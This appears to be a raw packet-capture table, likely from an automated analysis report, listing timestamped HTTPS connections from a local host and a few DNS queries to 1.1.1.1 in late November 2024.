              Nov 30, 2024 00:41:23.970458031 CET49798443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.970475912 CET4434979813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.970487118 CET49798443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.970491886 CET4434979813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.973026037 CET49802443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.973052025 CET4434980213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.973131895 CET49802443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.973278999 CET49802443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.973287106 CET4434980213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:24.063416004 CET4434979613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:24.063483953 CET4434979613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:24.063536882 CET49796443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:24.063668966 CET49796443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:24.063678026 CET4434979613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:24.063685894 CET49796443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:24.063689947 CET4434979613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:24.065769911 CET49803443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:24.065795898 CET4434980313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:24.065870047 CET49803443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:24.065979958 CET49803443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:24.065992117 CET4434980313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.393476963 CET4434979913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.393996954 CET49799443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:25.394011021 CET4434979913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.394941092 CET49799443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:25.394947052 CET4434979913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.541846991 CET4434980013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.542315006 CET49800443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:25.542335987 CET4434980013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.542889118 CET49800443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:25.542892933 CET4434980013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.546622992 CET4434980113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.547023058 CET49801443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:25.547039986 CET4434980113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.547425985 CET49801443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:25.547430038 CET4434980113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.629966974 CET44349778142.250.181.100192.168.2.4
              Nov 30, 2024 00:41:25.630024910 CET44349778142.250.181.100192.168.2.4
              Nov 30, 2024 00:41:25.630065918 CET49778443192.168.2.4142.250.181.100
              Nov 30, 2024 00:41:25.791353941 CET4434980313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.791912079 CET49803443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:25.791924000 CET4434980313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.792428017 CET49803443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:25.792432070 CET4434980313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.820854902 CET4434980213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.821269035 CET49802443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:25.821280956 CET4434980213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.821675062 CET49802443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:25.821677923 CET4434980213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.831182957 CET4434979913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.831254005 CET4434979913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.831306934 CET49799443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:25.831446886 CET49799443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:25.831463099 CET4434979913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.831473112 CET49799443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:25.831479073 CET4434979913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.834480047 CET49804443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:25.834510088 CET4434980413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.834597111 CET49804443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:25.834741116 CET49804443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:25.834754944 CET4434980413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.989999056 CET4434980013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.990055084 CET4434980013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.990113020 CET49800443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:25.990297079 CET49800443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:25.990317106 CET4434980013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.990329981 CET49800443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:25.990335941 CET4434980013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.992573023 CET4434980113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.992717028 CET4434980113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.992806911 CET49801443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:25.992831945 CET49801443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:25.992831945 CET49801443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:25.992842913 CET4434980113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.992851019 CET4434980113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.993192911 CET49805443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:25.993233919 CET4434980513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.993311882 CET49805443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:25.993427038 CET49805443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:25.993442059 CET4434980513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.994973898 CET49806443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:25.994988918 CET4434980613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:25.995058060 CET49806443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:25.995193958 CET49806443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:25.995207071 CET4434980613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:26.234117985 CET4434980313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:26.234180927 CET4434980313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:26.234227896 CET49803443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:26.234401941 CET49803443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:26.234411955 CET4434980313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:26.234420061 CET49803443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:26.234424114 CET4434980313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:26.237468004 CET49807443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:26.237498045 CET4434980713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:26.237576008 CET49807443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:26.237729073 CET49807443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:26.237740993 CET4434980713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:26.279822111 CET4434980213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:26.279865026 CET4434980213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:26.279907942 CET49802443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:26.280046940 CET49802443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:26.280059099 CET4434980213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:26.280071974 CET49802443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:26.280076027 CET4434980213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:26.282310963 CET49808443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:26.282326937 CET4434980813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:26.282402992 CET49808443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:26.282552004 CET49808443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:26.282566071 CET4434980813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:27.396126986 CET49778443192.168.2.4142.250.181.100
              Nov 30, 2024 00:41:27.396142960 CET44349778142.250.181.100192.168.2.4
              Nov 30, 2024 00:41:27.616854906 CET4434980413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:27.617579937 CET49804443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:27.617594004 CET4434980413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:27.618130922 CET49804443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:27.618135929 CET4434980413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:27.710171938 CET4434980513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:27.710649967 CET49805443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:27.710680008 CET4434980513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:27.711042881 CET49805443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:27.711049080 CET4434980513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:27.714612961 CET4434980613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:27.714871883 CET49806443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:27.714879990 CET4434980613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:27.715183020 CET49806443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:27.715188026 CET4434980613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.002103090 CET4434980813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.002681971 CET49808443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.002697945 CET4434980813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.003169060 CET49808443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.003173113 CET4434980813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.018650055 CET4434980713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.018979073 CET49807443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.018997908 CET4434980713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.019423008 CET49807443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.019428015 CET4434980713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.064127922 CET4434980413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.064193010 CET4434980413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.064285994 CET49804443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.064507961 CET49804443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.064517975 CET4434980413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.064552069 CET49804443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.064560890 CET4434980413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.067929029 CET49809443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.067955017 CET4434980913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.068018913 CET49809443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.068173885 CET49809443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.068188906 CET4434980913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.147785902 CET4434980513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.147838116 CET4434980513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.147907972 CET49805443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.148086071 CET49805443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.148097992 CET4434980513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.148127079 CET49805443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.148133039 CET4434980513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.150505066 CET49810443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.150525093 CET4434981013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.150592089 CET49810443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.150717020 CET49810443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.150727034 CET4434981013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.152528048 CET4434980613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.152597904 CET4434980613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.152663946 CET49806443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.152776957 CET49806443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.152781010 CET4434980613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.152796984 CET49806443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.152800083 CET4434980613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.154937983 CET49811443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.154949903 CET4434981113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.155029058 CET49811443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.155188084 CET49811443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.155200005 CET4434981113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.440033913 CET4434980813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.440085888 CET4434980813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.440140963 CET49808443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.440431118 CET49808443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.440442085 CET4434980813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.440449953 CET49808443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.440454006 CET4434980813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.443721056 CET49812443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.443747044 CET4434981213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.443808079 CET49812443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.443996906 CET49812443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.444009066 CET4434981213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.465461016 CET4434980713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.465534925 CET4434980713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.465578079 CET49807443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.465651989 CET49807443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.465660095 CET4434980713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.465670109 CET49807443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.465672970 CET4434980713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.467936039 CET49813443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.467962980 CET4434981313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:28.468038082 CET49813443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.468158960 CET49813443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:28.468173027 CET4434981313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:29.870352030 CET4434981013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:29.870978117 CET49810443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:29.870997906 CET4434981013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:29.871454954 CET49810443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:29.871459007 CET4434981013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:29.916023016 CET4434980913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:29.917113066 CET49809443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:29.917139053 CET4434980913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:29.917538881 CET49809443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:29.917543888 CET4434980913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:29.942569971 CET4434981113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:29.942920923 CET49811443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:29.942949057 CET4434981113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:29.943263054 CET49811443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:29.943268061 CET4434981113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.158866882 CET4434981213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.159506083 CET49812443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.159538984 CET4434981213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.160078049 CET49812443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.160083055 CET4434981213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.253374100 CET4434981313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.253885031 CET49813443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.253906012 CET4434981313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.254302025 CET49813443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.254307032 CET4434981313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.308783054 CET4434981013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.308835983 CET4434981013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.309037924 CET49810443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.309068918 CET49810443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.309087038 CET4434981013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.309097052 CET49810443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.309102058 CET4434981013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.312134027 CET49814443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.312164068 CET4434981413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.312242031 CET49814443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.312391043 CET49814443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.312405109 CET4434981413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.372767925 CET4434980913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.372836113 CET4434980913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.372895002 CET49809443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.373018980 CET49809443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.373034000 CET4434980913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.373044014 CET49809443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.373049974 CET4434980913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.375240088 CET49815443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.375271082 CET4434981513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.375345945 CET49815443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.375478029 CET49815443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.375490904 CET4434981513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.387618065 CET4434981113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.387681007 CET4434981113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.387732983 CET49811443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.387830019 CET49811443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.387835026 CET4434981113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.387845039 CET49811443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.387849092 CET4434981113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.389821053 CET49816443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.389856100 CET4434981613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.389934063 CET49816443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.390075922 CET49816443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.390089035 CET4434981613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.596782923 CET4434981213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.596831083 CET4434981213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.596972942 CET49812443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.597141981 CET49812443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.597151995 CET4434981213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.599100113 CET49817443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.599128008 CET4434981713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.599200010 CET49817443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.599330902 CET49817443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.599342108 CET4434981713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.700905085 CET4434981313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.700957060 CET4434981313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.701015949 CET49813443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.701159000 CET49813443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.701174974 CET4434981313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.701188087 CET49813443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.701193094 CET4434981313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.703110933 CET49818443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.703135014 CET4434981813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:30.703212976 CET49818443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.703350067 CET49818443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:30.703361034 CET4434981813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.169076920 CET4434981413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.169588089 CET49814443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.169611931 CET4434981413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.170078039 CET49814443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.170083046 CET4434981413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.189766884 CET4434981613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.190130949 CET49816443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.190155029 CET4434981613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.190366030 CET49816443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.190370083 CET4434981613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.238092899 CET4434981513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.238415003 CET49815443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.238445044 CET4434981513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.238795042 CET49815443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.238801003 CET4434981513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.424658060 CET4434981813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.425353050 CET49818443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.425353050 CET49818443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.425371885 CET4434981813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.425379038 CET4434981813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.451235056 CET4434981713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.451859951 CET49817443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.451859951 CET49817443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.451880932 CET4434981713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.451889992 CET4434981713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.625075102 CET4434981413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.625128031 CET4434981413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.625369072 CET49814443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.625369072 CET49814443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.626024961 CET49814443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.626036882 CET4434981413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.627865076 CET49819443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.627903938 CET4434981913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.628077984 CET49819443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.628077984 CET49819443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.628108025 CET4434981913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.635504007 CET4434981613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.635668993 CET4434981613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.635797977 CET49816443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.635797977 CET49816443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.635823965 CET49816443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.635833979 CET4434981613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.637830973 CET49820443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.637856007 CET4434982013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.638247013 CET49820443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.638247013 CET49820443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.638268948 CET4434982013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.694869041 CET4434981513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.694926023 CET4434981513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.695082903 CET49815443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.695082903 CET49815443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.695245981 CET49815443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.695259094 CET4434981513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.697052002 CET49821443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.697083950 CET4434982113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.697232008 CET49821443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.697314024 CET49821443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.697328091 CET4434982113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.864113092 CET4434981813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.864171028 CET4434981813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.864367962 CET49818443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.864367962 CET49818443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.864427090 CET49818443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.864442110 CET4434981813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.866743088 CET49822443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.866766930 CET4434982213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.866946936 CET49822443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.867089987 CET49822443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.867095947 CET4434982213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.907625914 CET4434981713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.907682896 CET4434981713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.907844067 CET49817443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.907845020 CET49817443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.908238888 CET49817443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.908252001 CET4434981713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.909934044 CET49823443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.909954071 CET4434982313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:32.910223961 CET49823443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.910276890 CET49823443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:32.910284042 CET4434982313.107.246.63192.168.2.4
              TimestampSource PortDest PortSource IPDest IP
              Nov 30, 2024 00:40:10.991784096 CET53525671.1.1.1192.168.2.4
              Nov 30, 2024 00:40:10.991795063 CET53537321.1.1.1192.168.2.4
              Nov 30, 2024 00:40:13.708743095 CET53583571.1.1.1192.168.2.4
              Nov 30, 2024 00:40:14.128989935 CET5841653192.168.2.41.1.1.1
              Nov 30, 2024 00:40:14.129131079 CET5532553192.168.2.41.1.1.1
              Nov 30, 2024 00:40:14.266330957 CET53553251.1.1.1192.168.2.4
              Nov 30, 2024 00:40:14.266598940 CET53584161.1.1.1192.168.2.4
              Nov 30, 2024 00:40:15.981487036 CET5670953192.168.2.41.1.1.1
              Nov 30, 2024 00:40:15.981887102 CET5765753192.168.2.41.1.1.1
              Nov 30, 2024 00:40:16.376904964 CET53567091.1.1.1192.168.2.4
